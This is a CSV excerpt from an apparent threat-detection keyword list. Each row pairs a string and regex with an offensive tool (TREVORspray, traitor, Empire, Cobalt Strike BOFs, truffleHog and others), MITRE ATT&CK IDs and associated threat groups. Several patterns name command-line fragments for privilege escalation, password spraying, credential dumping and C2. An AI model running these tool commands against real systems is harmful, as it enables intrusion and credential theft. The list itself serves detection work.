"*toto %3e c:\\temp\\toto.txt*",".{0,1000}toto\s\%3e\sc\:\\\\temp\\\\toto\.txt.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","61525"
"*touch /tmp/pwnd*",".{0,1000}touch\s\/tmp\/pwnd.{0,1000}","offensive_tool_keyword","NachoVPN","NachoVPN is a Proof of Concept that demonstrates exploitation of SSL-VPN clients using a rogue VPN serve","T1071 - T1027 - T1547 - T1204","TA0003 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/AmberWolfCyber/NachoVPN","1","0","#linux","N/A","7","3","218","28","2024-11-28T12:40:55Z","2024-10-30T15:53:56Z","61526"
"*touch /tmp/shim-pwn-success*",".{0,1000}touch\s\/tmp\/shim\-pwn\-success.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","61527"
"*tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq*",".{0,1000}tQgGur6TFdW9YMbiyuaj9g6yBJb2tCbcgrEq.{0,1000}","offensive_tool_keyword","ABPTTS","TCP tunneling over HTTP/HTTPS for web application servers","T1071.001 - T1573","TA0003 - TA0011","N/A","N/A","Persistence","https://github.com/nccgroup/ABPTTS","1","0","N/A","N/A","9","8","735","151","2016-08-12T19:36:24Z","2016-07-29T21:45:57Z","61532"
"*trailofbits/onesixtyone*",".{0,1000}trailofbits\/onesixtyone.{0,1000}","offensive_tool_keyword","onesixtyone","Fast SNMP scanner. onesixtyone takes a different approach to SNMP scanning. It takes advantage of the fact that SNMP is a connectionless protocol and sends all SNMP requests as fast as it can. Then the scanner waits for responses to come back and logs them in a fashion similar to Nmap ping sweeps","T1046 - T1018","TA0007 - TA0005","N/A","N/A","Reconnaissance","https://github.com/trailofbits/onesixtyone","1","1","N/A","N/A","N/A","6","594","90","2023-04-11T18:21:38Z","2014-02-07T17:02:49Z","61533"
"*trainr3kt/MemReader_BoF*",".{0,1000}trainr3kt\/MemReader_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/MemReader_BoF","1","1","N/A","N/A","10","10","46","6","2023-12-05T23:25:22Z","2021-04-21T20:51:25Z","61534"
"*trainr3kt/Readfile_BoF*",".{0,1000}trainr3kt\/Readfile_BoF.{0,1000}","offensive_tool_keyword","cobaltstrike","MemReader Beacon Object File will allow you to search and extract specific strings from a target process memory and return what is found to the beacon output","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trainr3kt/Readfile_BoF","1","1","N/A","N/A","10","10","21","5","2022-06-21T04:50:39Z","2021-04-01T03:47:56Z","61535"
"*traitor -a *",".{0,1000}traitor\s\-a\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61536"
"*traitor --any *",".{0,1000}traitor\s\-\-any\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61537"
"*traitor -e *",".{0,1000}traitor\s\-e\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61538"
"*traitor -e polkit*",".{0,1000}traitor\s\-e\spolkit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61539"
"*traitor --exploit*",".{0,1000}traitor\s\-\-exploit.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61540"
"*traitor -p *",".{0,1000}traitor\s\-p\s.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/liamg/traitor","1","0","#linux","N/A","N/A","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61541"
"*traitor-amd64 upload*",".{0,1000}traitor\-amd64\supload.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","61542"
"*TransitPathName EvilPathName ServiceName start/stop\*",".{0,1000}TransitPathName\sEvilPathName\sServiceName\sstart\/stop\\.{0,1000}","offensive_tool_keyword","CreateService","Creating a persistent service","T1543.003 - T1547.001 - T1050","TA0003","N/A","N/A","Persistence","https://github.com/uknowsec/CreateService","1","0","#content","N/A","4","2","105","27","2021-04-26T06:43:12Z","2020-09-23T05:03:52Z","61543"
"*translate.google.com/translate?&anno=2&u=$c2server*",".{0,1000}translate\.google\.com\/translate\?\&anno\=2\&u\=\$c2server.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","1","N/A","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","61544"
"*tree_connect_andx_request*",".{0,1000}tree_connect_andx_request.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","Exploit-EternalBlue.ps1","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","61545"
"*trendmicro pass AV remove.bat*",".{0,1000}trendmicro\spass\sAV\sremove\.bat.{0,1000}","offensive_tool_keyword","Dispossessor","script used in the Dispossessor ransomware group notes","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","61546"
"*Trevohack/DynastyPersist*",".{0,1000}Trevohack\/DynastyPersist.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","61547"
"*TrevorC2*",".{0,1000}TrevorC2.{0,1000}","offensive_tool_keyword","trevorc2","Command and Control via Legitimate Behavior over HTTP","T1105 - T1071 - T1070","TA0011","N/A","N/A","C2","https://github.com/trustedsec/trevorc2","1","1","N/A","N/A","10","10","1271","271","2022-01-31T20:16:24Z","2017-10-27T15:59:28Z","61548"
"*trevorproxy ssh*",".{0,1000}trevorproxy\sssh.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61549"
"*trevorproxy subnet*",".{0,1000}trevorproxy\ssubnet.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61550"
"*trevorsaudi/Mshikaki*",".{0,1000}trevorsaudi\/Mshikaki.{0,1000}","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tool","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","N/A","9","2","135","25","2023-11-26T18:13:40Z","2023-09-03T16:35:50Z","61551"
"*trevorspray -*",".{0,1000}trevorspray\s\-.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61552"
"*trevorspray *--recon *",".{0,1000}trevorspray\s.{0,1000}\-\-recon\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61553"
"*trevorspray -u *",".{0,1000}trevorspray\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61554"
"*trevorspray.cli*",".{0,1000}trevorspray\.cli.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61555"
"*trevorspray.enumerators*",".{0,1000}trevorspray\.enumerators.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61556"
"*trevorspray.looters*",".{0,1000}trevorspray\.looters.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61557"
"*trevorspray.py*",".{0,1000}trevorspray\.py.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61558"
"*trevorspray.sprayers*",".{0,1000}trevorspray\.sprayers.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61559"
"*trevorspray/existent_users.txt*",".{0,1000}trevorspray\/existent_users\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61560"
"*trevorspray/valid_logins.txt*",".{0,1000}trevorspray\/valid_logins\.txt.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","0","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61561"
"*TREVORspray-dev*",".{0,1000}TREVORspray\-dev.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61562"
"*TREVORspray-master*",".{0,1000}TREVORspray\-master.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61563"
"*TREVORspray-trevorspray*",".{0,1000}TREVORspray\-trevorspray.{0,1000}","offensive_tool_keyword","TREVORspray","TREVORspray is a modular password sprayer with threading - clever proxying - loot modules and more","T1110.003 - T1059.005 - T1071.001","TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/blacklanternsecurity/TREVORspray","1","1","N/A","N/A","10","10","1156","154","2025-03-11T13:58:24Z","2020-09-06T23:02:37Z","61564"
"*tricks01.hwtxt*",".{0,1000}tricks01\.hwtxt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","61565"
"*trickster0/EDR_Detector*",".{0,1000}trickster0\/EDR_Detector.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","61566"
"*trickster0/Enyx*",".{0,1000}trickster0\/Enyx.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","1","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","61567"
"*trickster0/NamelessC2*",".{0,1000}trickster0\/NamelessC2.{0,1000}","offensive_tool_keyword","NamelessC2","A C2 with all its components written in Rust","T1102 - T1573.001 - T1027 - T1219 - T1205","TA0011 - TA0003 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/trickster0/NamelessC2","1","1","N/A","N/A","10","10","266","33","2024-09-26T21:21:20Z","2024-09-26T21:06:37Z","61568"
"*trickster0/TartarusGate*",".{0,1000}trickster0\/TartarusGate.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","N/A","10","6","579","72","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z","61569"
"*Troedx765nLiedx765nk*",".{0,1000}Troedx765nLiedx765nk.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","61570"
"*Trojan:Win32/TurtleLoader.*",".{0,1000}Trojan\:Win32\/TurtleLoader\..{0,1000}","offensive_tool_keyword","FilelessPELoader","Loading Remote AES Encrypted PE in memory - Decrypted it and run it","T1027.001 - T1059.001 - T1071","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/FilelessPELoader","1","0","N/A","N/A","10","10","933","196","2023-08-29T21:46:11Z","2023-02-08T16:59:33Z","61619"
"*TR-SLimey/wraith-RAT*",".{0,1000}TR\-SLimey\/wraith\-RAT.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","61639"
"*TrU57(C00K13s)*",".{0,1000}TrU57\(C00K13s\).{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","61640"
"*truecrypt2john.py*",".{0,1000}truecrypt2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","61641"
"*truerustyy/wcreddump*",".{0,1000}truerustyy\/wcreddump.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","1","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","61642"
"*trufflehog filesystem *",".{0,1000}trufflehog\sfilesystem\s.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61643"
"*trufflehog gcs --project-id=*",".{0,1000}trufflehog\sgcs\s\-\-project\-id\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61644"
"*trufflehog git *",".{0,1000}trufflehog\sgit\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","61645"
"*trufflehog git https://github.com/*",".{0,1000}trufflehog\sgit\shttps\:\/\/github\.com\/.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61646"
"*trufflehog github --org=*",".{0,1000}trufflehog\sgithub\s\-\-org\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61647"
"*trufflehog github --repo=*",".{0,1000}trufflehog\sgithub\s\-\-repo\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61648"
"*trufflehog s3 --bucket=*",".{0,1000}trufflehog\ss3\s\-\-bucket\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61649"
"*trufflehog s3 --role-arn=*",".{0,1000}trufflehog\ss3\s\-\-role\-arn\=.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","61650"
